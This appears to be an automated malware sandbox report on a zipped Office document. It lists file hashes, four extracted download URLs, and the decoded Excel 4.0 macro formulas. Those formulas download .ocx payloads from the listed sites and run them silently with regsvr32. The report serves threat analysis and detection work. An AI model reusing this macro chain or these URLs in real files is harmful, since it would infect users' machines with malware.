General
-
Target
2beea54bb18d7ca77d0d0ecfc7c315ff5d4b046e0ae0ec3f1c943aa491e7be05.zip
-
Size
36KB
-
MD5
d95200047eee64603a31c2807ee19076
-
SHA1
59d8b56467cf144bceed25df3e65d8a8b29a84e8
-
SHA256
bd17d6fe4ec17020faab8393681a0d90f42d4553e51e60230da2becf459f8ab2
-
SHA512
d76cd7b539d5e8c17bf8a13e6ad9a182341574226b4c56d7a701aff344652d02c645cb7c850f4883cb2fe636d824d64f9c21ef74bc8d468ba6fe8298abd6bb56
-
SSDEEP
768:24vXY3y8nNtzLW5vGYfEOpPKsd4tP5XTG+qTBxIa5SNnOY4Gczg97Xsz:2KXY3np6eYfEO514tP5DG+c5W4W7M
Malware Config
Extracted
https://www.centurypapers.com/classes/jNaLifXh9jHzIb/
http://charmslovespells.com/yt-assets/ouRMgGG/
http://chaledooleo.com.br/headers/q7JUE0LzZJQsCQ/
http://www.cesasin.com.ar/administrator/U12P8KYU/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.centurypapers.com/classes/jNaLifXh9jHzIb/","..\phdg1.ocx",0,0) =EXEC("C:\Windows\System32\regsvr32.exe /S ..\phdg1.ocx") =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://charmslovespells.com/yt-assets/ouRMgGG/","..\phdg2.ocx",0,0) =EXEC("C:\Windows\System32\regsvr32.exe /S ..\phdg2.ocx") =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://chaledooleo.com.br/headers/q7JUE0LzZJQsCQ/","..\phdg3.ocx",0,0) =EXEC("C:\Windows\System32\regsvr32.exe /S ..\phdg3.ocx") =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.cesasin.com.ar/administrator/U12P8KYU/","..\phdg4.ocx",0,0) =EXEC("C:\Windows\System32\regsvr32.exe /S ..\phdg4.ocx") =RETURN()
Signatures
-
Suspicious Office macro 1 IoCs
Office document equipped with 4.0 macros.
Files
-
2beea54bb18d7ca77d0d0ecfc7c315ff5d4b046e0ae0ec3f1c943aa491e7be05.zip
Password: infected
-
2beea54bb18d7ca77d0d0ecfc7c315ff5d4b046e0ae0ec3f1c943aa491e7be05